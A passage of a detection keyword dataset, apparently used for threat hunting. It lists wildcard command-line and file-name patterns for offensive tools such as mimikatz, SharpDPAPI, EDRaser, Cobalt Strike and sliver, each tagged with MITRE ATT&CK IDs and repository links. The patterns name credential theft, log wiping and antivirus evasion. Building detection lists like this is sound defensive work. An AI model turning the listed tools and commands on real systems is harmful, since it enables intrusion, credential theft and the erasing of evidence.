TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -* athena.mythic*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -* --attack bruteforce*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -* --attack injection*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -* --attack partial_d --key *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --attack partial_q --key *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -attack remote_db -db_type * -db_username * -db_password *,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -* --attack vulns *,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -* -attack windows_application_event_log_local*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -* -attack windows_event_log*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -* -attack windows_security_event_log_remote*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -* --attacker-host *,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,0,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -* --attacker-port *,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,0,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -* -attak syslog*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -* --authmode ntlm --username * --password *,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -* auth-owners.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* auth-spoof.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* avred.py *,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -* avredweb.py *,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -* awsloot.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,0,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -* -b *.bin *.bin dump*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,0,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -* BabelStrike.py*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,0,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -* --backdoor *,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,0,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -* backdoor.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* backorifice-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* backorifice-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* backupkey* /server:* /file*.pvk*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* bacnet-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* banner.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* base64_encode_shellcode*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,0,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -"* --basic ""FUZZ:FUZ2Z""*",offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --batch --dbs*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --batch --password*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* beacon.dll*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -* beacon_win_default*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -* --beacon=*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,0,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -* beacon64.bin *,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,0,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -* Benjamin DELPY *,offensive_tool_keyword,mimikatz,mimikatz default strings,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -* beRoot.py*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,0,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -* bettercap*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -* bhqc.py -*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,0,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z -* -bindPipe * -destHost * -destPort *,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,0,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -* bitcoin-getaddr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bitcoin-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bitcoinrpc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bittorrent-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bjnp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Blackout.cpp*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -* Blackout.sln*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -* Blackout.sys*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -* bleeding-jumbo john*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* blindeventlog.exe*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -* blob /target:*.bin* /pvk:*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* blob /target:*.bin* /unprotect*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* --blockDLLs --ruy-lopez*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,1,N/A,N/A,N/A,N/A -* --bloodhound --ns ip --collection All*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* bof_allocator *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -* bof_reuse_memory *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -* -BOFBytes *,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,0,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -* BOFNET *,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 